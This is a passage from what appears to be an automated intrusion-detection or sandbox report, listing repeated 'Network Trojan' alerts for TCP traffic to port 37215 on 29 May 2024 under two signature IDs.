                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631296
                SID:2835222
                Source Port:39920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421947
                SID:2829579
                Source Port:39864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321206
                SID:2835222
                Source Port:48900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843332
                SID:2835222
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436497
                SID:2835222
                Source Port:53628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509641
                SID:2829579
                Source Port:54836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836552
                SID:2829579
                Source Port:58186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785548
                SID:2835222
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.235119
                SID:2829579
                Source Port:55708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.560706
                SID:2835222
                Source Port:55838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948629
                SID:2829579
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898370
                SID:2835222
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361877
                SID:2829579
                Source Port:34474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363412
                SID:2829579
                Source Port:55540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982210
                SID:2835222
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950071
                SID:2829579
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771188
                SID:2835222
                Source Port:49578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897426
                SID:2835222
                Source Port:59392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.894836
                SID:2835222
                Source Port:47018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628250
                SID:2835222
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284835
                SID:2829579
                Source Port:54784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433846
                SID:2835222
                Source Port:57582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160950
                SID:2835222
                Source Port:59408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043809
                SID:2835222
                Source Port:53830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961020
                SID:2829579
                Source Port:55526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744720
                SID:2829579
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840446
                SID:2829579
                Source Port:32896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133165
                SID:2829579
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060907
                SID:2835222
                Source Port:49052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831183
                SID:2835222
                Source Port:50054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660306
                SID:2829579
                Source Port:43408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964636
                SID:2835222
                Source Port:57152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220699
                SID:2835222
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088326
                SID:2835222
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805881
                SID:2829579
                Source Port:47868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972737
                SID:2835222
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326027
                SID:2835222
                Source Port:41084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560913
                SID:2835222
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231057
                SID:2829579
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762900
                SID:2835222
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465515
                SID:2829579
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210901
                SID:2829579
                Source Port:44706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339200
                SID:2835222
                Source Port:32850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328407
                SID:2829579
                Source Port:56884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266187
                SID:2835222
                Source Port:46184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726285
                SID:2829579
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962711
                SID:2829579
                Source Port:35026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447292
                SID:2835222
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521293
                SID:2835222
                Source Port:47096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597557
                SID:2829579
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985710
                SID:2835222
                Source Port:39110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654957
                SID:2829579
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784676
                SID:2835222
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558021
                SID:2835222
                Source Port:50390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155055
                SID:2829579
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990112
                SID:2829579
                Source Port:49580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863368
                SID:2829579
                Source Port:38684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618867
                SID:2829579
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562331
                SID:2829579
                Source Port:35962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579387
                SID:2835222
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141166
                SID:2835222
                Source Port:43484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369692
                SID:2835222
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989028
                SID:2835222
                Source Port:52926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141338
                SID:2835222
                Source Port:36800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384230
                SID:2835222
                Source Port:36882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716112
                SID:2835222
                Source Port:36206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782145
                SID:2835222
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845486
                SID:2829579
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879310
                SID:2835222
                Source Port:50900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169359
                SID:2829579
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993058
                SID:2835222
                Source Port:35076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555110
                SID:2835222
                Source Port:50336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528109
                SID:2835222
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665272
                SID:2835222
                Source Port:50044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730570
                SID:2829579
                Source Port:50126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440243
                SID:2829579
                Source Port:43448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963276
                SID:2829579
                Source Port:54826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981210
                SID:2835222
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944623
                SID:2829579
                Source Port:56436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711700
                SID:2835222
                Source Port:36540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165877
                SID:2835222
                Source Port:33268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436545
                SID:2835222
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467492
                SID:2829579
                Source Port:34694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852472
                SID:2829579
                Source Port:46682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385971
                SID:2829579
                Source Port:59972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419400
                SID:2835222
                Source Port:40828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521308
                SID:2829579
                Source Port:35910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896501
                SID:2835222
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668585
                SID:2829579
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955438
                SID:2829579
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665962
                SID:2829579
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833510
                SID:2835222
                Source Port:58222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014399
                SID:2835222
                Source Port:58742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321820
                SID:2829579
                Source Port:33180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166453
                SID:2835222
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227371
                SID:2829579
                Source Port:50698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453527
                SID:2829579
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788329
                SID:2829579
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217080
                SID:2829579
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315906
                SID:2829579
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584344
                SID:2829579
                Source Port:53998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559399
                SID:2835222
                Source Port:39500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015750
                SID:2835222
                Source Port:41212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025587
                SID:2835222
                Source Port:50910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965736
                SID:2835222
                Source Port:49350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038561
                SID:2835222
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520698
                SID:2835222
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281369
                SID:2829579
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518939
                SID:2829579
                Source Port:59718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653442
                SID:2835222
                Source Port:47070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076330
                SID:2829579
                Source Port:40328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571494
                SID:2835222
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721778
                SID:2829579
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070265
                SID:2829579
                Source Port:33622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218049
                SID:2835222
                Source Port:44908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719487
                SID:2829579
                Source Port:46176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728778
                SID:2829579
                Source Port:47412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597460
                SID:2829579
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915455
                SID:2835222
                Source Port:50160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378606
                SID:2835222
                Source Port:49446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783879
                SID:2829579
                Source Port:46798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048898
                SID:2835222
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948106
                SID:2835222
                Source Port:50934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129297
                SID:2835222
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369851
                SID:2835222
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226869
                SID:2835222
                Source Port:56878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536695
                SID:2835222
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901224
                SID:2829579
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.654868
                SID:2835222
                Source Port:60426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.560739
                SID:2829579
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845469
                SID:2835222
                Source Port:35786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909799
                SID:2835222
                Source Port:38610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873778
                SID:2829579
                Source Port:42700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182341
                SID:2829579
                Source Port:36434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571456
                SID:2829579
                Source Port:54128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323096
                SID:2835222
                Source Port:57336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328426
                SID:2829579
                Source Port:38224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014813
                SID:2829579
                Source Port:55298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418089
                SID:2835222
                Source Port:44738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432523
                SID:2829579
                Source Port:34000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784774
                SID:2829579
                Source Port:56700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667927
                SID:2829579
                Source Port:41942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716339
                SID:2829579
                Source Port:51318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280565
                SID:2829579
                Source Port:37354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162687
                SID:2835222
                Source Port:48852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010673
                SID:2835222
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422193
                SID:2829579
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618131
                SID:2835222
                Source Port:34296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687190
                SID:2829579
                Source Port:33898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931446
                SID:2835222
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422072
                SID:2835222
                Source Port:58400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.741712
                SID:2829579
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026650
                SID:2835222
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009703
                SID:2829579
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184333
                SID:2835222
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867835
                SID:2829579
                Source Port:36950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631394
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685001
                SID:2829579
                Source Port:42452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576106
                SID:2835222
                Source Port:43396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903493
                SID:2829579
                Source Port:42160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335782
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500152
                SID:2835222
                Source Port:36368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321617
                SID:2829579
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013138
                SID:2829579
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037650
                SID:2829579
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788233
                SID:2835222
                Source Port:42812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988649
                SID:2835222
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965785
                SID:2835222
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670727
                SID:2835222
                Source Port:58344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087826
                SID:2829579
                Source Port:54284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207685
                SID:2829579
                Source Port:36836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518971
                SID:2829579
                Source Port:41480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225552
                SID:2835222
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814572
                SID:2829579
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929714
                SID:2835222
                Source Port:33322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985342
                SID:2829579
                Source Port:54796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557132
                SID:2829579
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790851
                SID:2835222
                Source Port:48724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445942
                SID:2835222
                Source Port:50318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522461
                SID:2835222
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.828050
                SID:2829579
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982414
                SID:2829579
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882747
                SID:2835222
                Source Port:57250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557984
                SID:2835222
                Source Port:49728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071336
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445412
                SID:2829579
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335425
                SID:2829579
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386195
                SID:2829579
                Source Port:40752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231318
                SID:2829579
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617609
                SID:2835222
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237424
                SID:2835222
                Source Port:59816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597304
                SID:2829579
                Source Port:38706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440713
                SID:2829579
                Source Port:33698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531564
                SID:2835222
                Source Port:58070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827421
                SID:2835222
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694664
                SID:2835222
                Source Port:51244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262651
                SID:2829579
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
